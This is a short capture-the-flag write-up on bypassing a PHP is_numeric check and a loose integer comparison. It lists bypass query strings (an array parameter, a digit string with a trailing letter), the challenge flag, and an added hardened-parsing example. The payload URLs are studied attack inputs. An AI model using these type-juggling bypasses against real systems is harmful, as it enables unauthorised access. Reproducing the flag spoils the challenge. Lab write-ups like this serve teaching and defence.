Code Audit: Bypassing a Weakly Typed Integer Size Comparison

mac, 2022-06-30

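$temp = $_GET['password'];
// Reject any value that PHP considers numeric
is_numeric($temp) ? die("no numeric") : NULL;
// Loose comparison: $temp is not guaranteed to be an integer here
if ($temp > 1336) {
    echo $flag;
}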

is_numeric

is_numeric can likewise be bypassed with an array, with truncation, or by appending other characters.


http://123.206.87.240:9009/22.php?password[]=1
http://123.206.87.240:9009/22.php?password=9999a
http://123.206.87.240:9009/22.php?password=9999


flag{bugku_null_numeric}
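The check above, next to a stricter form, as an added example that is not part of the original post. It parses the three query strings from the page offline with parse_str() and prints how each value is typed and handled; weak_gate(), strict_int() and strict_gate() are hypothetical names introduced here.

```php
<?php
// The page's check wrapped in a function: returns true where the
// original script would reach "echo $flag".
function weak_gate($temp): bool
{
    if (is_numeric($temp)) {
        return false;        // original: die("no numeric")
    }
    // Loose comparison on an unvalidated type. PHP orders an array above
    // any integer, and a string with trailing characters is not "numeric"
    // for is_numeric() yet still takes part in the comparison.
    return $temp > 1336;
}

// Hypothetical hardened parser: accept only a string of 1 to 9 ASCII
// digits (no sign, whitespace, suffix or array), then convert to int.
function strict_int($value): ?int
{
    if (!is_string($value) || preg_match('/\A[0-9]{1,9}\z/', $value) !== 1) {
        return null;
    }
    return (int) $value;
}

// Compare only after the value is known to be an integer.
function strict_gate($value): bool
{
    $n = strict_int($value);
    return $n !== null && $n > 1336;
}

// Query strings taken from the URLs on the page.
$queries = ['password[]=1', 'password=9999a', 'password=9999'];

foreach ($queries as $qs) {
    parse_str($qs, $get);    // same parsing rules PHP applies to $_GET
    $p = $get['password'] ?? null;
    printf(
        "%-16s type=%-6s weak_gate=%-5s strict_int=%-4s strict_gate=%s\n",
        $qs,
        gettype($p),
        var_export(weak_gate($p), true),
        var_export(strict_int($p), true),
        var_export(strict_gate($p), true)
    );
}
```

With strict parsing, the array and the suffixed string never reach the comparison at all, so the type-juggling paths the page relies on are closed.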

Reposted from: https://www.cnblogs.com/gaonuoqi/p/11407106.html
